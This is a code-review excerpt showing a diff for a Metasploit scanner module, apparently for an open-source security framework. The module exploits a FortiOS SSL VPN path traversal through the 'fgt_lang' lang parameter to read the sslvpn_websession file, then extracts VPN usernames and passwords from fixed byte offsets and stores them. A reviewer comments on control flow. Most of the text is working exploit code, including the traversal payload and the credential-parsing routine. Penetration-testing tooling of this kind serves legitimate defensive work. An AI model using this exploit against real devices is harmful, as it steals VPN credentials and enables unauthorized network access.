modules/auxiliary/scanner/http/fortios_vpnssl_traversal_leak.rb

```diff
@@ -0,0 +1,184 @@
+      ],
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL' => true
+      },
+    ))
+
+    register_options([
+      OptEnum.new('DUMP_FORMAT', [true,  'Dump format.', 'raw', ['raw', 'ascii']]),
+      OptBool.new('STORE_CRED', [false, 'Store credential into the database.', true]),
+      OptBool.new('STORE_LOOT', [false, 'Store dump in loot.', false]),
+      OptString.new('TARGETURI', [true, 'Base path', '/remote'])
+    ])
+  end
+
+  def execute_request
+    payload = '/../../../..//////////dev/cmdb/sslvpn_websession'
+
+    uri = normalize_uri(target_uri.path, 'fgt_lang')
+    begin
+      response = send_request_cgi({
+        'method' => 'GET',
+        'uri' => uri,
+        'vars_get' => {
+          'lang' => payload
+        }
+      })
+
+    rescue StandardError => e
+      print_error(message("#{e.message}"))
+      return nil
+    end
+
+    if response && response.code == 200
+      if response.body =~ /var fgt_lang/
+        print_good(message('Vulnerable!'))
+
+        report_vuln(
+          host: @ip_address,
+          name: name,
+          refs: references,
+        )
+
+        return response.body if datastore['STORE_CRED'] == true
+      end
+    elsif response && response.code == 404
+      print_error(message('NOT Vulnerable!'))
+    end
+
+    return nil
+  end
+
+  def message(msg)
+    "#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
+  end
+
+  def parse_config(chunk)
+    credential = {
+      ip: @ip_address,
+      port: datastore['RPORT'],
+      service_name: @proto,
+      user: read_param(chunk[36..421]),
+      password: read_param(chunk[422..550]),
+      group: read_param(chunk[551..622]),
+      profile: read_param(chunk[623..698])
+    }
+  end
+
+  def read_param(param)
+    output = ''
+    param.each_char do |c|
+      break if c == "\x00"
+      output << c
+    end
+    return output
+  end
+
+  def report_creds(creds)
+    creds.each do |cred|
+      cred = eval(cred)
+
+      if !cred[:user].blank? && !cred[:password].blank?
+        service_data = {
+          address: cred[:ip],
+          port: cred[:port],
+          service_name: cred[:service_name],
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
+        }
+
+        credential_data = {
+          origin_type: :service,
+          module_fullname: fullname,
+          username: cred[:user],
+          private_data: cred[:password],
+          private_type: :password
+        }.merge(service_data)
+
+        login_data = {
+          core: create_credential(credential_data),
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }.merge(service_data)
+
+        create_credential_login(login_data)
+      end
+
+    end
+  end
+
+  def run_host(ip)
+    @proto = (ssl ? 'https' : 'http')
+    @ip_address = ip
+
+    print_status(message('Trying to connect.'))
+    data = execute_request
+    if !data.nil?
```

Comment:
Rather than wrap the entire method in this conditional branch it would make more sense to return early here. It would also be nice to include an error message.

```ruby
if data.nil?
  print_error(message('No data received'))
  return
end
```